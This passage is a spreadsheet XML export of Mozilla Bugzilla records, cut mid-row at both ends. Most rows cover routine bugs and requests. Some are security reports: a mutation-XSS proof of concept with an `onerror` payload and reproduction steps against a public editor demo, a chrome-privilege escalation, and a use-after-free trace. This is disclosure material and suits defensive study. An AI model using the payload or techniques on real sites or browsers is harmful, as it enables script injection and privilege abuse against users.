      <c r="E4957" t="n">
        <v>1</v>
      </c>
      <c r="F4957" t="n">
        <v>1</v>
      </c>
      <c r="G4957" t="n">
        <v>3</v>
      </c>
      <c r="H4957" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4957" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4957" t="inlineStr">
        <is>
          <t>Internationalization</t>
        </is>
      </c>
      <c r="K4957" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4957" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4957" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N4957" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4957" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4957" t="inlineStr">
        <is>
          <t>[adt2] [ETA 09/23]</t>
        </is>
      </c>
      <c r="Q4957" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4957" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S4957" t="inlineStr">
        <is>
          <t>mozilla1.0.2</t>
        </is>
      </c>
      <c r="T4957" t="n">
        <v>1</v>
      </c>
      <c r="U4957" t="n">
        <v>0</v>
      </c>
      <c r="V4957" t="n">
        <v>37</v>
      </c>
      <c r="W4957" t="inlineStr">
        <is>
          <t>Need to better support Level 3 IME.
ftang: pls add further information on this issue, based on conversations and
needs of the customer.</t>
        </is>
      </c>
      <c r="X4957" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4958">
      <c r="A4958" t="n">
        <v>765814</v>
      </c>
      <c r="B4958" t="inlineStr">
        <is>
          <t>2012-06-18 10:19:53 -0700</t>
        </is>
      </c>
      <c r="C4958" t="inlineStr">
        <is>
          <t>Please redirect nightly-profiling users to the nightly branch</t>
        </is>
      </c>
      <c r="D4958" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E4958" t="n">
        <v>1</v>
      </c>
      <c r="F4958" t="n">
        <v>1</v>
      </c>
      <c r="G4958" t="n">
        <v>5</v>
      </c>
      <c r="H4958" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I4958" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J4958" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K4958" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L4958" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4958" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N4958" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4958" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4958" t="inlineStr"/>
      <c r="Q4958" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R4958" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4958" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4958" t="n">
        <v>1</v>
      </c>
      <c r="U4958" t="n">
        <v>0</v>
      </c>
      <c r="V4958" t="n">
        <v>12</v>
      </c>
      <c r="W4958" t="inlineStr">
        <is>
          <t>The profiling branch is being repurposed, and is no longer useful for human users.  I'll file another bug to stop doing nightly builds on it.</t>
        </is>
      </c>
      <c r="X4958" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4959">
      <c r="A4959" t="n">
        <v>1602843</v>
      </c>
      <c r="B4959" t="inlineStr">
        <is>
          <t>2019-12-10 09:27:37 -0800</t>
        </is>
      </c>
      <c r="C4959" t="inlineStr">
        <is>
          <t>Mutation XSS via copy-and-paste in WYSIWYG editors</t>
        </is>
      </c>
      <c r="D4959" t="inlineStr">
        <is>
          <t>2024-05-30 10:05:20 -0700</t>
        </is>
      </c>
      <c r="E4959" t="n">
        <v>1</v>
      </c>
      <c r="F4959" t="n">
        <v>1</v>
      </c>
      <c r="G4959" t="n">
        <v>3</v>
      </c>
      <c r="H4959" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4959" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4959" t="inlineStr">
        <is>
          <t>DOM: Serializers</t>
        </is>
      </c>
      <c r="K4959" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4959" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4959" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4959" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4959" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4959" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?][adv-main72+][adv-esr68.4+]</t>
        </is>
      </c>
      <c r="Q4959" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4959" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4959" t="inlineStr">
        <is>
          <t>mozilla73</t>
        </is>
      </c>
      <c r="T4959" t="n">
        <v>0</v>
      </c>
      <c r="U4959" t="n">
        <v>0</v>
      </c>
      <c r="V4959" t="n">
        <v>37</v>
      </c>
      <c r="W4959" t="inlineStr">
        <is>
          <t>I've been recently analyzing copying and pasting in browsers and found a bug similar to bug 1599181, but this one allows a mutation XSS on pasting. The webpage needs to follow some specific pattern to be vulnerable but I could find some quite easily.
The root of the issue is exactly the same as it was in bug 1599181, that is serializing of CSS. To recap, if pasted content contains `&lt;style&gt;`  tag, Firefox decides to sanitize it. The stylesheet is pasted verbatim if it doesn't contain any "dangerous" rules (like `@import`), but it is rewritten if it does. Consider the following example:
```html
&lt;style&gt;
@import''; 
@font-face { font-family: 'ab&lt;\/style&gt;&lt;img src onerror=alert(1)&gt;'}
&lt;/style&gt;
```
Because of `@import`, after pasting, the code would be sanitized to:
```html
&lt;style&gt;
@font-face { font-family: "ab&lt;/style&gt;&lt;img src onerror=alert(1)&gt;"; }
&lt;/style&gt;
```
Please note how `&lt;\/style&gt;` was transformed to `&lt;/style&gt;`. This doesn't introduce any issue by itself because in the case above, the text node of the stylesheet is modified directly, hence the `&lt;/style&gt;`  inside doesn't close the tag. However, if the application does something akin to:
```js
textEditor.innerHTML = clipboardData.innerHTML;
```
then it is vulnerable to XSS, because the `&lt;img&gt;` tag would leave the `&lt;style&gt;` tag. It was my assumption that certain applications might do that and by quick googling I found **two** WYSIWYG editors who do exactly this.  So perhaps there are even more.
# Proof of Concept
1. Go to https://jsbin.com/xivapasere/1/edit?html,output.
2. Press `copy me`.
3. Go to https://rawgit.com/alohaeditor/Aloha-Editor/hotfix/src/demo/boilerplate/ (one of the editors that's vulnerable to this mutation XSS).
4. Give Aloha Editor a while to load...
5. Go to any `contenteditable` content.
6. Paste from clipboard.
7. Alert fires!
I don't consider it a bug in Aloha Editor, more of a bug in Firefox itself. To understand why `alert` fired, have a look at https://rawgit.com/alohaeditor/Aloha-Editor/hotfix/src/plugins/common/paste/lib/paste-plugin.js - line 274. What the editor does is that it paste the content in an invisible `&lt;div&gt;` (called `$clipboard` or `$CLIPBOARD` in the code).
Then, using jQuery, the code is parsed as HTML:
```js
			if (typeof content === 'string') {
				$content = $('&lt;div&gt;' + content + '&lt;/div&gt;');
			} else if (content instanceof $) {
				$content = $('&lt;div&gt;').append(content);
			}
```
In the PoC `content` is equal to `"&lt;style&gt;@font-face { font-family: \"ab&lt;/style&gt;&lt;img src onerror=alert(1)&gt;\"; }&lt;/style&gt;"`, leading to an obvious XSS issue.
I think that perhaps Firefox sanitizer could always escape `&lt;` to `\3c ` in CSS strings to get rid of the issue?
For the record, I've also reported certain copy-and-paste bugs to Chromium and they decided to go a different way altogether and they just delete `&lt;style&gt;` tag from pasted content by serializing it into inline `style` attributes. I think that it significantly reduces the risk. Safari also does the same. 
Here's the approach pasted from Chromium patch:
```
This patch follows the same approach as in WebKit [1]:
- First create a dummy document to insert the markup
- Then computes style and layout in the dummy document
- Re-serialize the dummy document as the markup to be inserted. This
  reuses the code path that we serialize a selection range into
  clipboard, where we need to serialize element computed style into
  inline styles so that the element styles are preserved.
- Make sure all style elements are removed before inserting markup
  into document
```</t>
        </is>
      </c>
      <c r="X4959" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4960">
      <c r="A4960" t="n">
        <v>1177529</v>
      </c>
      <c r="B4960" t="inlineStr">
        <is>
          <t>2015-06-25 14:21:14 -0700</t>
        </is>
      </c>
      <c r="C4960" t="inlineStr">
        <is>
          <t>Please add users to group vpn_cloudops_redshift</t>
        </is>
      </c>
      <c r="D4960" t="inlineStr">
        <is>
          <t>2015-06-26 13:31:08 -0700</t>
        </is>
      </c>
      <c r="E4960" t="n">
        <v>1</v>
      </c>
      <c r="F4960" t="n">
        <v>1</v>
      </c>
      <c r="G4960" t="n">
        <v>5</v>
      </c>
      <c r="H4960" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I4960" t="inlineStr">
        <is>
          <t>Infrastructure &amp; Operations</t>
        </is>
      </c>
      <c r="J4960" t="inlineStr">
        <is>
          <t>Corporate VPN: ACL requests</t>
        </is>
      </c>
      <c r="K4960" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L4960" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4960" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4960" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4960" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4960" t="inlineStr"/>
      <c r="Q4960" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R4960" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4960" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4960" t="n">
        <v>1</v>
      </c>
      <c r="U4960" t="n">
        <v>0</v>
      </c>
      <c r="V4960" t="n">
        <v>2</v>
      </c>
      <c r="W4960" t="inlineStr">
        <is>
          <t>Please could you add Max Fischer-Zernin to the group so he can access data from redshift. Thanks!</t>
        </is>
      </c>
      <c r="X4960" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4961">
      <c r="A4961" t="n">
        <v>690970</v>
      </c>
      <c r="B4961" t="inlineStr">
        <is>
          <t>2011-09-30 17:08:04 -0700</t>
        </is>
      </c>
      <c r="C4961" t="inlineStr">
        <is>
          <t>cycle collector can be made to Unlink live objects (by using weak maps or watchpoints)</t>
        </is>
      </c>
      <c r="D4961" t="inlineStr">
        <is>
          <t>2013-11-25 13:20:23 -0800</t>
        </is>
      </c>
      <c r="E4961" t="n">
        <v>1</v>
      </c>
      <c r="F4961" t="n">
        <v>1</v>
      </c>
      <c r="G4961" t="n">
        <v>3</v>
      </c>
      <c r="H4961" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4961" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4961" t="inlineStr">
        <is>
          <t>XPCOM</t>
        </is>
      </c>
      <c r="K4961" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4961" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4961" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4961" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4961" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4961" t="inlineStr">
        <is>
          <t>[adv-main19+][adv-esr1703+]</t>
        </is>
      </c>
      <c r="Q4961" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4961" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4961" t="inlineStr">
        <is>
          <t>mozilla21</t>
        </is>
      </c>
      <c r="T4961" t="n">
        <v>1</v>
      </c>
      <c r="U4961" t="n">
        <v>0</v>
      </c>
      <c r="V4961" t="n">
        <v>71</v>
      </c>
      <c r="W4961" t="inlineStr">
        <is>
          <t>Created attachment 563899
test case
As I reported earlier in Bug 667011, Igor figured out that my patch in Bug 653248 can cause the CC to incorrectly consider reachable objects to be garbage.  It turns out that this is actually also the case for trunk without that patch applied, too.  I discovered this after writing a test case for Bug 667011.
Anyways, so the result of this is that you can make the cycle collector call Unlink() on any object you can manipulate with Javascript, even if the object isn't actually dead.  In my particular test case, this is not a danger, because the Unlink just removes the child, which can be done anyways, but I'm not sure how safe this is in general.  Do you have any idea, Peter?
My test case is a mochitest chrome test, but the only high privilege thing I do is explicitly call the GC and CC.  You could probably just wait a minute for them to be called naturally.
Running the test case results in the following message:
mochitest-chrome failed:
6 ERROR TEST-UNEXPECTED-FAIL | chrome://mochitests/content/chrome/js/src/xpconnect/tests/chrome/test_bug653248.xul | DOM element indirectly reachable via gray weak map entry was unlinked. - didn't expect null, but got it
val_elem gets Unlink() called on it, causing its child to be dropped, but we can still get to val_elem, because it is being held live by a JS wrapper, and is reachable by the weak map.  This weak map edge is invisible to the cycle collector because the map itself is black, and in the current code, the CC is not told about the connection from the key to the value.
In the previous bug, I thought this wouldn't be a problem on trunk, because the GC marks weak map entries black (which is what my patch was fixing).  But I wasn't thinking about the fact that the weak reference marking phase violates a very important GC invariant: Never Mark Black After Gray (we should enforce this more rigorously, or make it not a problem by making black overwrite gray).  If the gray marking gets to an object reachable from both black and grey before the black marking gets there, it will end up gray.  If an object is gray when it should be black, then the CC can end up freeing a reachable object.
In my example code, I create a cycle between a DOM element val_elem and the weak map entry value v, which means that the entry gets marked gray before weak map marking happens.  The CC then traces from val_elem and decides it is garbage.</t>
        </is>
      </c>
      <c r="X4961" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4962">
      <c r="A4962" t="n">
        <v>805024</v>
      </c>
      <c r="B4962" t="inlineStr">
        <is>
          <t>2012-10-24 08:30:41 -0700</t>
        </is>
      </c>
      <c r="C4962" t="inlineStr">
        <is>
          <t>Crash when XML binding (XBL) includes another binding which contains SVG</t>
        </is>
      </c>
      <c r="D4962" t="inlineStr">
        <is>
          <t>2013-04-30 18:40:53 -0700</t>
        </is>
      </c>
      <c r="E4962" t="n">
        <v>1</v>
      </c>
      <c r="F4962" t="n">
        <v>1</v>
      </c>
      <c r="G4962" t="n">
        <v>3</v>
      </c>
      <c r="H4962" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4962" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4962" t="inlineStr">
        <is>
          <t>SVG</t>
        </is>
      </c>
      <c r="K4962" t="inlineStr">
        <is>
          <t>15 Branch</t>
        </is>
      </c>
      <c r="L4962" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4962" t="inlineStr">
        <is>
          <t>Windows 7</t>
        </is>
      </c>
      <c r="N4962" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4962" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4962" t="inlineStr">
        <is>
          <t>[adv-main18+][adv-esr17+]</t>
        </is>
      </c>
      <c r="Q4962" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4962" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4962" t="inlineStr">
        <is>
          <t>mozilla19</t>
        </is>
      </c>
      <c r="T4962" t="n">
        <v>1</v>
      </c>
      <c r="U4962" t="n">
        <v>0</v>
      </c>
      <c r="V4962" t="n">
        <v>32</v>
      </c>
      <c r="W4962" t="inlineStr">
        <is>
          <t>Created attachment 674669
ff_xbl_svg_crash.zip
User Agent: Mozilla/5.0 (Windows NT 6.1; rv:16.0) Gecko/20100101 Firefox/16.0
Build ID: 20121010144125
Steps to reproduce:
The XBL file contains two XML bindings, "pie_chart" and "pie_chart_segment".
Both contain SVG. When you insert "pie_chart_segment" into "pie_chart" with the help of the &lt;children/&gt; XBL tag -- Firefox crashes.
Reproducible: always.
How to reporoduce:
1. Install 'Remote XUL Manager' addon, so you can open local XUL files https://addons.mozilla.org/en-US/firefox/addon/remote-xul-manager/
2. Add a &lt;file&gt; record in Remote XUL Manager's allowed URL list
3. Unpack ff_xbl_svg_crash.zip
4. Open test.xul
Firefox will crash.</t>
        </is>
      </c>
      <c r="X4962" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4963">
      <c r="A4963" t="n">
        <v>567069</v>
      </c>
      <c r="B4963" t="inlineStr">
        <is>
          <t>2010-05-20 01:57:21 -0700</t>
        </is>
      </c>
      <c r="C4963" t="inlineStr">
        <is>
          <t>Security problem with SJOW and fast native function</t>
        </is>
      </c>
      <c r="D4963" t="inlineStr">
        <is>
          <t>2010-09-03 20:21:56 -0700</t>
        </is>
      </c>
      <c r="E4963" t="n">
        <v>1</v>
      </c>
      <c r="F4963" t="n">
        <v>1</v>
      </c>
      <c r="G4963" t="n">
        <v>3</v>
      </c>
      <c r="H4963" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4963" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4963" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K4963" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4963" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4963" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N4963" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4963" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4963" t="inlineStr">
        <is>
          <t>[sg:critical][critsmash:investigating][ETA:6/10]</t>
        </is>
      </c>
      <c r="Q4963" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4963" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4963" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4963" t="n">
        <v>1</v>
      </c>
      <c r="U4963" t="n">
        <v>0</v>
      </c>
      <c r="V4963" t="n">
        <v>26</v>
      </c>
      <c r="W4963" t="inlineStr">
        <is>
          <t>Since SafeCallGuard sets cx-&gt;fp to null, when a fast native function is called
via SJOW, cx-&gt;fp is null.  And, when NewObject(cx, clasp, NULL, NULL) is
called, js_GetClassPrototype uses cx-&gt;globalObject as scope if cx-&gt;fp is null. 
Thus, if a code running on a chrome's context accesses a content object via
SJOW, a content code can get an object from the chrome's scope and run
arbitrary code with chrome privileges by using that object.
Trunk and 1.9.2 are affected.  (On older branches, SJOW creates scripted
callers instead of using SafeCallGuard.)
Firebug and DOM Inspector are exploitable.</t>
        </is>
      </c>
      <c r="X4963" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4964">
      <c r="A4964" t="n">
        <v>1546314</v>
      </c>
      <c r="B4964" t="inlineStr">
        <is>
          <t>2019-04-23 02:30:47 -0700</t>
        </is>
      </c>
      <c r="C4964" t="inlineStr">
        <is>
          <t>Enhance --validate in compare-locales to be a proper linter</t>
        </is>
      </c>
      <c r="D4964" t="inlineStr">
        <is>
          <t>2019-04-26 01:59:39 -0700</t>
        </is>
      </c>
      <c r="E4964" t="n">
        <v>1</v>
      </c>
      <c r="F4964" t="n">
        <v>1</v>
      </c>
      <c r="G4964" t="n">
        <v>5</v>
      </c>
      <c r="H4964" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I4964" t="inlineStr">
        <is>
          <t>Localization Infrastructure and Tools</t>
        </is>
      </c>
      <c r="J4964" t="inlineStr">
        <is>
          <t>compare-locales</t>
        </is>
      </c>
      <c r="K4964" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4964" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4964" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4964" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4964" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4964" t="inlineStr"/>
      <c r="Q4964" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R4964" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4964" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4964" t="n">
        <v>1</v>
      </c>
      <c r="U4964" t="n">
        <v>0</v>
      </c>
      <c r="V4964" t="n">
        <v>3</v>
      </c>
      <c r="W4964" t="inlineStr">
        <is>
          <t>While refactoring the gecko linter in bug 1353680, it dawned on me that much of this should actually be in compare-locales proper.
That way, we can also make enhancements that benefit our Android l10n story, in particular conflict-checking against android-l10n.</t>
        </is>
      </c>
      <c r="X4964" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4965">
      <c r="A4965" t="n">
        <v>814713</v>
      </c>
      <c r="B4965" t="inlineStr">
        <is>
          <t>2012-11-23 08:11:25 -0800</t>
        </is>
      </c>
      <c r="C4965" t="inlineStr">
        <is>
          <t>Heap-use-after-free in TableBackgroundPainter::TableBackgroundData::Destroy</t>
        </is>
      </c>
      <c r="D4965" t="inlineStr">
        <is>
          <t>2024-05-30 07:52:05 -0700</t>
        </is>
      </c>
      <c r="E4965" t="n">
        <v>1</v>
      </c>
      <c r="F4965" t="n">
        <v>1</v>
      </c>
      <c r="G4965" t="n">
        <v>3</v>
      </c>
      <c r="H4965" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4965" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4965" t="inlineStr">
        <is>
          <t>Layout: Tables</t>
        </is>
      </c>
      <c r="K4965" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4965" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4965" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4965" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4965" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4965" t="inlineStr">
        <is>
          <t>[asan][adv-main18+][adv-esr17+][adv-esr10+]</t>
        </is>
      </c>
      <c r="Q4965" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4965" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4965" t="inlineStr">
        <is>
          <t>mozilla20</t>
        </is>
      </c>
      <c r="T4965" t="n">
        <v>1</v>
      </c>
      <c r="U4965" t="n">
        <v>0</v>
      </c>
      <c r="V4965" t="n">
        <v>24</v>
      </c>
      <c r="W4965" t="inlineStr">
        <is>
          <t>Created attachment 684709
repro-file
Tested on:
OS: Ubuntu 12.04 x86_64
Firefox build: https://people.mozilla.com/~choller/firefox/asan/20121123-mozilla-central-linux64-debug-d8e4f06198dc+asan.html
ASAN-report snippet:
###!!! ASSERTION: colgroup data should not be null - bug 237421: 'mCols[i].mColGroup', file /builds/slave/try-lnx64-dbg/build/layout/tables/nsTablePainter.cpp, line 314
###!!! ASSERTION: colgroup data should not be null - bug 237421: 'mCols[i].mColGroup', file /builds/slave/try-lnx64-dbg/build/layout/tables/nsTablePainter.cpp, line 314
=================================================================
==5093== ERROR: AddressSanitizer heap-use-after-free on address 0x7fb9757737a8 at pc 0x7fb99e71f5a3 bp 0x7fffd048eae0 sp 0x7fffd048ead8
READ of size 8 at 0x7fb9757737a8 thread T0
    #0 0x7fb99e71f5a2 in TableBackgroundPainter::TableBackgroundData::Destroy(nsPresContext*) /builds/slave/try-lnx64-dbg/build/layout/tables/nsTablePainter.cpp:123
    #1 0x7fb99e72016b in ~TableBackgroundPainter /builds/slave/try-lnx64-dbg/build/layout/tables/nsTablePainter.cpp:239
    #2 0x7fb99e6df4b6 in nsTableFrame::PaintTableBorderBackground(nsRenderingContext&amp;, nsRect const&amp;, nsPoint, unsigned int) /builds/slave/try-lnx64-dbg/build/layout/tables/nsTableFrame.cpp:1310
    #3 0x7fb99e6df1a8 in nsDisplayTableBorderBackground::Paint(nsDisplayListBuilder*, nsRenderingContext*) /builds/slave/try-lnx64-dbg/build/layout/tables/nsTableFrame.cpp:1086
    #4 0x7fb99e20e74c in mozilla::FrameLayerBuilder::DrawThebesLayer(mozilla::layers::ThebesLayer*, gfxContext*, nsIntRegion const&amp;, nsIntRegion const&amp;, void*) /builds/slave/try-lnx64-dbg/build/layout/base/FrameLayerBuilder.cpp:3274
    #5 0x7fb9a094c008 in mozilla::layers::BasicThebesLayer::PaintBuffer(gfxContext*, nsIntRegion const&amp;, nsIntRegion const&amp;, nsIntRegion const&amp;, bool, void (*)(mozilla::layers::ThebesLayer*, gfxContext*, nsIntRegion const&amp;, nsIntRegion const&amp;, void*), void*) /builds/slave/try-lnx64-dbg/build/gfx/layers/basic/BasicThebesLayer.h:94
.
.
.
freed by thread T0 here:
    #0 0x43f180 in operator delete(void*) ??:0
    #1 0x7fb99e72017b in ~TableBackgroundPainter /builds/slave/try-lnx64-dbg/build/layout/tables/nsTablePainter.cpp:240
    #2 0x7fb99e6df4b6 in nsTableFrame::PaintTableBorderBackground(nsRenderingContext&amp;, nsRect const&amp;, nsPoint, unsigned int) /builds/slave/try-lnx64-dbg/build/layout/tables/nsTableFrame.cpp:1310
    #3 0x7fb99e6df1a8 in nsDisplayTableBorderBackground::Paint(nsDisplayListBuilder*, nsRenderingContext*) /builds/slave/try-lnx64-dbg/build/layout/tables/nsTableFrame.cpp:1086
    #4 0x7fb99e20e74c in mozilla::FrameLayerBuilder::DrawThebesLayer(mozilla::layers::ThebesLayer*, gfxContext*, nsIntRegion const&amp;, nsIntRegion const&amp;, void*) /builds/slave/try-lnx64-dbg/build/layout/base/FrameLayerBuilder.cpp:3274
    #5 0x7fb9a094c008 in mozilla::layers::BasicThebesLayer::PaintBuffer(gfxContext*, nsIntRegion const&amp;, nsIntRegion const&amp;, nsIntRegion const&amp;, bool, void (*)(mozilla::layers::ThebesLayer*, gfxContext*, nsIntRegion const&amp;, nsIntRegion const&amp;, void*), void*) /builds/slave/try-lnx64-dbg/build/gfx/layers/basic/BasicThebesLayer.h:94
.
.
.</t>
        </is>
      </c>
      <c r="X4965" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4966">
      <c r="A4966" t="n">
        <v>1783504</v>
      </c>
      <c r="B4966" t="inlineStr">
        <is>
          <t>2022-08-06 02:54:50 -0700</t>
        </is>
      </c>
      <c r="C4966" t="inlineStr">
        <is>
          <t>Compromised content process can UpdateDocumentURI</t>
        </is>
      </c>
      <c r="D4966" t="inlineStr">
        <is>
          <t>2024-09-18 19:40:35 -0700</t>
        </is>
      </c>
      <c r="E4966" t="n">
        <v>1</v>
      </c>
      <c r="F4966" t="n">
        <v>1</v>
      </c>
      <c r="G4966" t="n">
        <v>3</v>
      </c>
      <c r="H4966" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4966" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4966" t="inlineStr">
        <is>
          <t>DOM: Content Processes</t>
        </is>
      </c>
      <c r="K4966" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4966" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4966" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4966" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4966" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4966" t="inlineStr">
        <is>
          <t>[disclosure 11 Aug 2023][reporter-external] [client-bounty-form] [verif?][adv-main122+] [adv-main126-]</t>
        </is>
      </c>
      <c r="Q4966" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4966" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S4966" t="inlineStr">
        <is>
          <t>126 Branch</t>
        </is>
      </c>
      <c r="T4966" t="n">
        <v>1</v>
      </c>
      <c r="U4966" t="n">
        <v>0</v>
      </c>
      <c r="V4966" t="n">
        <v>80</v>
      </c>
      <c r="W4966" t="inlineStr">
        <is>
          <t>Created attachment 9288698
poc.patch
`WindowGlobalParent::RecvUpdateDocumentURI` does not validate the new DocumentURI, so a compromised content process is able to set an arbitrary documentURI (https://searchfox.org/mozilla-central/rev/675d6b7b04c4a802493d29632ee45f6e036a5702/dom/ipc/WindowGlobalParent.cpp#370).
This is used in several places including but not limited to:
1. Address bar and related components, when the history is updated, e.g., `history.pushState()` or `history.back()`.
2. `Hub.fillInAddress` for `extensions/ConduitsParent` (https://searchfox.org/mozilla-central/rev/675d6b7b04c4a802493d29632ee45f6e036a5702/toolkit/components/extensions/ConduitsParent.jsm#187)
This sets `MessageSender.url` for extension messages. Many extensions rely on `MessageSender.url` to verify whether the message came from a trusted source.
